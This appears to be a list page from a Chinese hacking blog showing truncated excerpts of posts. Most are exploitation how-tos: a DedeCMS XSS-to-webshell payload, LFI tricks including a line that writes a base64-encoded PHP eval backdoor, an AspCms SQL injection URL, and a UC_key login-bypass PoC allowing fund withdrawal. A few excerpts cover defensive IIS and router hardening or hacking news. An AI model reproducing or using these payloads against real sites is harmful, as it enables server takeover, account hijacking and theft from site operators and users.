dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)   目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...

- 阅读全文 -

利用phpinfo信息LFI临时文件

还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文...

- 阅读全文 -

LFI漏洞利用总结

主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 po...

- 阅读全文 -

LFI漏洞使用心得

1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>  ...

- 阅读全文 -

aspcms cookies欺骗和后台无验证注入

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗! ————————后台注射————————   https://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,l...

- 阅读全文 -

让webshell无法运行

       其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的 您试图从目录中执行CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序。 Interneter服务器管理----IIS中站点目录右键----属性----在主目录中 查看“执行权限”一般设置为“纯脚本”,脚本文件才能正常运行,设置为“无”则不能运行       把www.webshell.cc...

- 阅读全文 -

黑客入侵叙利亚总统邮箱密码竟然是12345!

   叙利亚总统 Bashar al-Assad 正因屠杀平民而面对全世界大多数国家的指责,连黑客组织也没有放过他,在星期一攻陷了他的办公电子邮箱。这次的入侵事件由著名黑客组织无名氏(Anonymous)发动,而取得目标邮箱的密码并无需使用神马手段,因为他们使用的密码简直弱爆了,就是“12345”,根据2011的一份安全研究这是第二弱密码。     无名氏同时将邮箱内的邮件向外公布,其中一封被公布...

- 阅读全文 -

iTunes用户账户莫名被黑,gift card不见了!!!

   苹果在与黑客的较量一直不占上风.很多iTunes账户都出现了余额不见,或是被更改账户资料的情况.大量的用户被购买了一堆应用,有些账户的PayPal以及信用卡信息也被篡改.类似的事件已经持续了一年多了,有人怀疑苹果是不是故意不打击类似行为.    虽然苹果并未确定类似事件的原因,但是一个很可能的解释就是苹果的gift card算法已被破解.因为可能有人知道了如何生成gift card,所以也可...

- 阅读全文 -

多多返利程序,任意用户登录,甚至可以提现

简要描述:多多返利程序,任意用户登录,甚至可以提现! 详细说明:https://www.webshell.cc/uc.php 在后台未开启ucenter时候,存在典型的UC_key未初始化漏洞 由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数 其中包括自动登陆 修改密码 漏洞证明:poc: <?php print_r(' -----------------------------...

- 阅读全文 -

9招预防路由器遭攻击

既然了解了我们的路由器容易遭遇攻击,那么该如何防备呢?在这里给出以下几点建议: 1. 及时更新路由器操作系统:就像网络操作系统一样,路由器操作系统也需要更新,以便纠正编程错误、软件瑕疵和缓存溢出的问题。要经常向你的路由器厂商查询当前的更新和操作系统的版本。 2. 修改默认口令:据卡内基梅隆大学的计算机应急反应小组称,80%的安全事件都是由于较弱或者默认的口令引起的。避免使用普通的口令,并且使用大小...

- 阅读全文 -